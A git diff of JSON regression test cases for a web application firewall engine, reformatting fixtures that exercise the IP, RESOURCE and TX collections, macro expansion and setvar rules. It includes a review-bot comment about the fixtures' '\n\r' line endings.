- "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ 
"\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Saving variable: IP:id_a with value: nops", - "http_code":403 + "expected": { + "debug_log": "Saving variable: IP:id_a with value: nops", + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS:/^id_/ \"@contains test\" \"id:11,phase:2,t:lowercase,initcol:ip=%{REMOTE_ADDR}\"", "SecRule ARGS:/^id_/ \"@contains test\" \"id:12,phase:2,t:lowercase,setvar:IP.id_a=nops\"", diff --git a/test/test-cases/regression/collection-resource.json b/test/test-cases/regression/collection-resource.json index b73d00cb14..762fd84129 100644 --- a/test/test-cases/regression/collection-resource.json +++ b/test/test-cases/regression/collection-resource.json 
@@ -1,49 +1,51 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: RESOURCE (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: RESOURCE (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?resource=whee", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?resource=whee", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ + "" ] }, - "expected":{ - "audit_log":"", 
- "debug_log":"Target value: \"123\" \\(Variable: RESOURCE:whee::::test\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"123\" \\(Variable: RESOURCE:whee::::test\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS:resource \"@unconditionalmatch \" \"phase:2,pass,initcol:resource=%{ARGS.resource},id:900003\"", "SecRule ARGS:resource \"@unconditionalmatch \" \"phase:2,pass,setvar:resource.test=123,id:900000\"", 
@@ -52,50 +54,52 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: RESOURCE (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: RESOURCE (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?resource=whee", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?resource=whee", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ + "" ] }, - "expected":{ - 
"audit_log":"", - "debug_log":"RESOURCE:whee::webappid::test", - "error_log":"" + "expected": { + "debug_log": "RESOURCE:whee::webappid::test", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecWebAppId webappid", "SecRule ARGS:resource \"@unconditionalmatch \" \"phase:2,pass,initcol:resource=%{ARGS.resource},id:900003\"", diff --git a/test/test-cases/regression/collection-tx-with-macro.json b/test/test-cases/regression/collection-tx-with-macro.json index a0173b6bb6..7225e2f3e3 100644 --- a/test/test-cases/regression/collection-tx-with-macro.json +++ b/test/test-cases/regression/collection-tx-with-macro.json 
@@ -1,173 +1,176 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (with macro) (1/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (with macro) (1/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ 
+ "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\" \\(Variable: TX:something\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\" \\(Variable: TX:something\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something=%{REQUEST_HEADERS:Cookie}%\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (with macro) (2/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (with macro) (2/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": 
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"1\" \\(Variable: TX:somethingPHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"1\" \\(Variable: TX:somethingPHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something%{REQUEST_HEADERS:Cookie}%\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (with macro) (3/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - 
"Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (with macro) (3/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"310\" \\(Variable: TX:something\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: 
\"310\" \\(Variable: TX:something\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something=%{REQUEST_HEADERS:Keep-Alive}%\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:2,t:lowercase,t:none,setvar:TX.something=+10\"", 
@@ -175,58 +178,59 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (with macro) (4/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (with macro) (4/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - 
"body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"5\" \\(Variable: TX:something_else\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"5\" \\(Variable: TX:something_else\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something=+10\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:2,t:lowercase,t:none,setvar:TX.something_else=%{tx.something}%\"", diff --git a/test/test-cases/regression/collection-tx.json b/test/test-cases/regression/collection-tx.json index 07099405f7..98d91b55aa 100644 --- a/test/test-cases/regression/collection-tx.json +++ b/test/test-cases/regression/collection-tx.json 
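Review bot: The response fixture in this hunk ends its header values and body lines with `\n\r` (LF then CR) and sets `Content-Length` to the literal `length`, and the re-indented `+` lines carry both over unchanged. Earlier in this series the harness stopped appending a newline to each body string, so, assuming the response body is built by the same helper, these bytes now reach the engine exactly as written and every line after the first begins with a stray CR. If the reversed order is not deliberate, use `\r\n` on the body lines and drop the terminator from the header values, e.g. `"Content-Type": "text/xml; charset=utf-8"`. The same fixture is repeated in the collection-tx.json hunks that follow, and the test object here continues past the end of the hunk.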
@@ -1,212 +1,217 @@ [ - { + { "enabled": 1, - "version_min":300000, - "version_max":0, - "title":"Collection :: TX full vs partial match", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "version_min": 300000, + "version_max": 0, + "title": "Collection :: TX full vs partial match", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)" }, - "uri":"/", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text/xml; charset=utf-8\n" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n" }, - "body":[ + "body": [ "\n" ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REMOTE_ADDR \"@unconditionalMatch\" \"id:1,deny,setvar:TX.partial_match=1,chain\"", "SecRule TX.partial \"@gt 0\" \"id:2,t:lowercase,t:none,status:444\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (1/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (1/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - 
"Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"to_test\" \\(Variable: TX:something\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"to_test\" \\(Variable: TX:something\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something=to_test\"", "SecRule TX \"@contains 
to_test\" \"id:2,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (2/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (2/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - 
"\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"1\" \\(Variable: TX:something\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"1\" \\(Variable: TX:something\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (3/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (3/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + 
"Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"20\" \\(Variable: TX:something\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"20\" 